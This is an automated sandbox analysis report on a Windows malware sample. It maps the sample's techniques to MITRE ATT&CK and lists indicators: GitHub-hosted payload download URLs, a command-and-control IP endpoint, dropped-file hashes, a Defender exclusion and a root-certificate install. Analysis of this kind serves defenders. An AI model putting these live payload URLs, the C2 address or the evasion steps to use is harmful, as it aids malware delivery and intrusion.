Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\1feP5qTCl0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
1
Masquerading
11
Input Capture
1
Query Registry
Remote Services11
Input Capture
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts21
Native API
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory211
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)1
Modify Registry
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook131
Virtualization/Sandbox Evasion
NTDS131
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Install Root Certificate
Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing
DCSync24
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499701 Sample: 1feP5qTCl0.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 39 raw.githubusercontent.com 2->39 41 httpbin.org 2->41 43 github.com 2->43 53 Multi AV Scanner detection for submitted file 2->53 55 AI detected suspicious sample 2->55 57 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->57 8 1feP5qTCl0.exe 3 2->8         started        signatures3 process4 dnsIp5 45 github.com 140.82.121.3, 443, 49738 GITHUBUS United States 8->45 47 raw.githubusercontent.com 185.199.109.133, 443, 49730, 49731 FASTLYUS Netherlands 8->47 49 httpbin.org 34.194.69.213, 443, 49741 AMAZON-AESUS United States 8->49 37 C:\Reka\rapnewsa.exe, PE32 8->37 dropped 59 Suspicious powershell command line found 8->59 61 Installs new ROOT certificates 8->61 63 Adds a directory exclusion to Windows Defender 8->63 13 rapnewsa.exe 8->13         started        17 powershell.exe 23 8->17         started        19 powershell.exe 23 8->19         started        21 5 other processes 8->21 file6 signatures7 process8 dnsIp9 51 45.125.66.18, 443, 49740 TELE-ASTeleAsiaLimitedHK Hong Kong 13->51 65 Antivirus detection for dropped file 13->65 67 Multi AV Scanner detection for dropped file 13->67 69 Found evasive API chain (may stop execution after checking mutex) 13->69 73 3 other signatures 13->73 23 WerFault.exe 13->23         started        71 Loading BitLocker PowerShell Module 17->71 25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        29 conhost.exe 21->29         started        31 conhost.exe 21->31         started        33 conhost.exe 21->33         started        35 2 other processes 21->35 signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
1feP5qTCl0.exe11%ReversingLabs
1feP5qTCl0.exe8%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Reka\rapnewsa.exe100%AviraHEUR/AGEN.1315917
C:\Reka\rapnewsa.exe100%Joe Sandbox ML
C:\Reka\rapnewsa.exe16%ReversingLabs
C:\Reka\rapnewsa.exe24%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
github.com0%VirustotalBrowse
raw.githubusercontent.com0%VirustotalBrowse
httpbin.org1%VirustotalBrowse
SourceDetectionScannerLabelLink
https://httpbin.org/get0%URL Reputationsafe
http://microsoft.co0%Avira URL Cloudsafe
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.comdefault-src0%Avira URL Cloudsafe
https://45.125.66.18/l90%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv0%Avira URL Cloudsafe
https://github.com0%Avira URL Cloudsafe
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.json0%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recvS0%Avira URL Cloudsafe
https://github.com/workhasf/kelm/raw/main/iconozave.exeC:0%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv3%VirustotalBrowse
https://45.125.66.18:443/api/receiver/recv0%Avira URL Cloudsafe
https://github.com0%VirustotalBrowse
https://github.com/workhasf/kelm/raw/main/iconozave.exe0%Avira URL Cloudsafe
http://microsoft.co1%VirustotalBrowse
https://45.125.66.18/api/receiver/recvz0%Avira URL Cloudsafe
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe0%Avira URL Cloudsafe
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.json0%Avira URL Cloudsafe
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe1%VirustotalBrowse
https://github.com/workhasf/kelm/raw/main/iconozave.exe0%VirustotalBrowse
https://45.125.66.18:443/api/receiver/recv3%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
github.com
140.82.121.3
truefalseunknown
raw.githubusercontent.com
185.199.109.133
truefalseunknown
httpbin.org
34.194.69.213
truefalseunknown
NameMaliciousAntivirus DetectionReputation
https://httpbin.org/getfalse
  • URL Reputation: safe
unknown
https://45.125.66.18/api/receiver/recvfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.jsonfalse
  • Avira URL Cloud: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exefalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.jsonfalse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://45.125.66.18/l9rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.comdefault-src1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://microsoft.corapnewsa.exe, 00000013.00000002.2038436475.00000000011D6000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://45.125.66.18/api/receiver/recvSrapnewsa.exe, 00000013.00000002.2038436475.000000000118E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeC:1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://45.125.66.18:443/api/receiver/recvrapnewsa.exe, 00000013.00000002.2038436475.00000000011CA000.00000004.00000020.00020000.00000000.sdmpfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://45.125.66.18/api/receiver/recvzrapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
185.199.109.133
raw.githubusercontent.comNetherlands
54113FASTLYUSfalse
34.194.69.213
httpbin.orgUnited States
14618AMAZON-AESUSfalse
140.82.121.3
github.comUnited States
36459GITHUBUSfalse
45.125.66.18
unknownHong Kong
133398TELE-ASTeleAsiaLimitedHKfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1499701
Start date and time:2024-08-27 12:54:14 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:25
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:1feP5qTCl0.exe
renamed because original name is a hash value
Original Sample Name:64aaffe3b4d705b9ddbce60e8fd8b9829c20438b8c68ae254e185c0f466e0265.exe
Detection:MAL
Classification:mal100.evad.winEXE@25/31@3/4
EGA Information:
  • Successful, ratio: 50%
HCA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target 1feP5qTCl0.exe, PID 6120 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
TimeTypeDescription
06:55:11API Interceptor94x Sleep call for process: powershell.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
185.199.109.133https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
    SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
      https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
        https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
          ep_setup.exeGet hashmaliciousUnknownBrowse
            http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
              http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                Neverlose.exeGet hashmaliciousXWormBrowse
                  Electronic_Receipt_ATT0001.htmGet hashmaliciousHTMLPhisherBrowse
                    https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.orgGet hashmaliciousHTMLPhisherBrowse
                      140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                      • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                      firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                      • github.com/john-xor/temp/blob/main/index.html?raw=true
                      0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                      • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                      MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                      • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                      RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                      • github.com/ssbb36/stv/raw/main/5.mp3
                      45.125.66.18V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                        V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          raw.githubusercontent.comSecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                          • 185.199.109.133
                          SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                          • 185.199.111.133
                          SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                          • 185.199.108.133
                          Neverlose.exeGet hashmaliciousXWormBrowse
                          • 185.199.109.133
                          N8LgG4xO0F.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 185.199.111.133
                          SecuriteInfo.com.Win64.Evo-gen.11830.19095.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                          • 185.199.108.133
                          FlashUpdates.jsGet hashmaliciousUnknownBrowse
                          • 185.199.109.133
                          1U34vTVJ97.pdfGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse
                          • 185.199.108.133
                          OD8uS0ksdv.exeGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          github.comhttps://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                          • 140.82.121.4
                          https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                          • 140.82.121.3
                          https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                          • 140.82.121.4
                          https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                          • 140.82.121.3
                          http://chengduyiwokeji-haiwai.datasink.datasjourney.comGet hashmaliciousUnknownBrowse
                          • 140.82.121.3
                          ep_setup.exeGet hashmaliciousUnknownBrowse
                          • 140.82.121.4
                          SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                          • 140.82.121.3
                          http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                          • 140.82.121.4
                          httpbin.orgIDMCRK.exeGet hashmaliciousFredy StealerBrowse
                          • 3.224.242.112
                          IDMCRK.exeGet hashmaliciousFredy StealerBrowse
                          • 3.224.242.112
                          Quarantined Messages(1).zipGet hashmaliciousUnknownBrowse
                          • 107.23.72.23
                          visabuilder.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                          • 54.86.243.105
                          IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                          • 54.243.255.141
                          IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                          • 54.86.243.105
                          https://maisontrouvaille8.wordpress.com/Get hashmaliciousUnknownBrowse
                          • 54.243.255.141
                          https://addtocartcommerce.wordpress.com/Get hashmaliciousUnknownBrowse
                          • 54.243.255.141
                          idman642build18Full.exeGet hashmaliciousFredy StealerBrowse
                          • 54.86.243.105
                          idman642build18Full.exeGet hashmaliciousFredy StealerBrowse
                          • 54.243.255.141
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          AMAZON-AESUSMoney Fellows Signatures Consent Docs#122531(Revised).pdfGet hashmaliciousUnknownBrowse
                          • 23.22.254.206
                          https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                          • 54.165.190.241
                          https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                          • 23.22.254.206
                          https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                          • 34.202.209.143
                          https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                          • 3.222.199.46
                          http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                          • 34.232.140.51
                          virus total.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 23.22.254.206
                          CMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                          • 52.202.204.11
                          https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915Get hashmaliciousUnknownBrowse
                          • 52.207.82.236
                          SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                          • 3.222.64.100
                          FASTLYUShttps://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                          • 151.101.66.137
                          https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                          • 199.232.188.84
                          http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                          • 199.232.188.84
                          https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                          • 185.199.109.133
                          http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                          • 151.101.129.229
                          virus total.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 199.232.210.172
                          Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                          • 104.244.43.131
                          https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915Get hashmaliciousUnknownBrowse
                          • 199.232.196.193
                          SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                          • 185.199.109.133
                          SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                          • 185.199.111.133
                          TELE-ASTeleAsiaLimitedHKV6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                          • 45.125.66.18
                          V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                          • 45.125.66.18
                          https://57365oo.cc/Get hashmaliciousPhisherBrowse
                          • 45.125.65.213
                          zte.arm7.elfGet hashmaliciousUnknownBrowse
                          • 45.125.66.78
                          Kxk45K3cAx.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.125.66.223
                          NVu6VqOPCN.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.125.66.223
                          4A4hEAVRnJ.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.125.66.223
                          Y6dJm8taZO.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.125.66.223
                          2Ipy5SuBUQ.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.125.66.223
                          KgIQ7WeeC1.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 45.125.66.223
                          GITHUBUShttps://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                          • 140.82.121.4
                          https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                          • 140.82.121.3
                          https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                          • 140.82.121.4
                          https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                          • 140.82.112.21
                          https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                          • 140.82.121.3
                          ep_setup.exeGet hashmaliciousUnknownBrowse
                          • 140.82.121.4
                          SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                          • 140.82.121.3
                          http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                          • 140.82.114.21
                          http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                          • 140.82.121.4
                          Neverlose.exeGet hashmaliciousXWormBrowse
                          • 140.82.121.4
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          72a589da586844d7f0818ce684948eeaV6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                          • 45.125.66.18
                          V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                          • 45.125.66.18
                          48DhuEoTcX.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                          • 45.125.66.18
                          6863(1)2.exeGet hashmaliciousCobaltStrikeBrowse
                          • 45.125.66.18
                          20240730#U7cfb#U7edf#U5f02#U5e38#U62a5#U9519.exeGet hashmaliciousCobaltStrikeBrowse
                          • 45.125.66.18
                          LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
                          • 45.125.66.18
                          LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
                          • 45.125.66.18
                          LisectAVT_2403002B_312.dllGet hashmaliciousTrickbotBrowse
                          • 45.125.66.18
                          2new.dll.dllGet hashmaliciousCobaltStrikeBrowse
                          • 45.125.66.18
                          havoc_x64.exeGet hashmaliciousHavocBrowse
                          • 45.125.66.18
                          No context
                          Process:C:\Users\user\Desktop\1feP5qTCl0.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):38912
                          Entropy (8bit):5.972409904582663
                          Encrypted:false
                          SSDEEP:768:ZCMmeyIJkkZ7XPImohfdjm7MEW/kJ7S/DWJ3GTHvvM1zI:ZCFeySkkJgl2MEW/ozwXM1
                          MD5:2D4E723C184D9403B078E53F2DE74A23
                          SHA1:92FA5F8F346CB987F249BD41755C5AEDAF4C8646
                          SHA-256:0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
                          SHA-512:A8F5267AE7F465A65A46D6ABEAED0C7A910C349E708E4264CC68747EE26DB78D62B575DEDB2E64553C207B914BA240654930774954DFA7503C93393CFADCE9AD
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 16%
                          • Antivirus: Virustotal, Detection: 24%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................n...............n.....n....Rich..................PE..L...PS.f...............&............0.............@.......................................@.....................................................................X.......................................................p............................text............................... ..`.rdata..............................@..@.data...D...........................@....reloc..X...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:modified
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
